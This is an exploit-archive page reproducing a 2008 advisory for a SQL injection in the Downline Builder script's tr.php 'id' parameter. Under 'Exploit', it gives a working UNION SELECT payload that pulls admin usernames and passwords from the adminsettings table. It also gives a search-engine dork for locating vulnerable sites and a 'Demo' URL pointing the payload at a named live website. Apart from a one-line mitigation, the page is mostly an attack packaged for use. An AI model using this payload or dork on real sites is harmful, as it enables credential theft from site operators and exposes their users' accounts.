header-logo
Suggest Exploit
vendor:
Downline Builder
by:
Hussin X
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Downline Builder
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Downline Builder( id ) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient filtration of user-supplied input passed via the 'id' parameter to the 'tr.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows to read arbitrary data from the database, including passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Downline Builder( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    : http://www.yourfreeworld.com/script/downlinebuilder.php

DorK   : inurl:tr.php?id= Downline

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


Demo :
_______

http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--





Greetz : All my freind

# milw0rm.com [2008-11-01]

Navigation

Suggest Exploit

Services By CQR